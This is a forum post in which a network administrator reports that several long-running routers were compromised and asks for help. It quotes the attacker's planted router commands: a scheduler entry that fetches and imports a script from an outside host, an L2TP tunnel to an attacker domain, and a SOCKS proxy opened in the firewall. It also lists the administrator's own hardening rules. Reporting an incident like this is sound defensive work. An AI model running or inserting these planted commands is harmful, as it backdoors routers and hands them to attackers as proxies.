that work for ~ 5 years (and even more) without any problems
today I have try to enter 5 of them and couldn't enter using winbox\api\ftp
only ssh
when I enter I saw this in the /system scheduler
Code: Select all
/tool fetch url=http://zancetom.com/poll/afb843ea-4472-46b7-a1d0-acd9ecebaf1f mode=http dst-path=7wmp0b4s.rsc
/import 7wmp0b4s.rsc
Code: Select all
/interface l2tp-client add name=lvpn keepalive-timeout=60 user=user5388942 password=pass5388942 connect-to=s88.leappoach.info disabled=no profile=default
Code: Select all
/ip socks
set enabled=yes port=5678
/ip firewall filter
add action=accept chain=input dst-port=5678 log-prefix="" protocol=tcp
/interface l2tp-client
add connect-to=s88.leappoach.info disabled=no name=lvpn password=pass5388942 \
profile=default user=user538894
I have check and the IP the connection is coming from is 198.18.0.1
I have remove all the setting and check there are no new surprises (there are not so many setting in the router - so it's easy for me to see the if there are setting I don't know)
this is what I have added in the firewall filter \ IP service:
Code: Select all
/ip firewall filter
add action=accept chain=input dst-port=21,22,8728,8291 log-prefix="" protocol=tcp src-address=10.0.0.0/24
add action=accept chain=input dst-port=21,22,8728,8291 log-prefix="" protocol=tcp src-address=172.16.0.0/16
add action=drop chain=input log-prefix="" protocol=tcp
/ip service
set telnet disabled=yes
set ftp address=10.0.0.0/24,172.16.0.0/16
set www address=10.0.0.0/24 disabled=yes
set ssh address=10.0.0.0/24,172.16.0.0/16
set api address=10.0.0.0/24,172.16.0.0/16
set winbox address=10.0.0.0/24,172.16.0.0/16
set api-ssl disabled=yes
1. what is the damage I'm facing?
2. what does "socks" do? where does it have access to ?
3. is the firewall\service rules I have added are good ?
Thanks,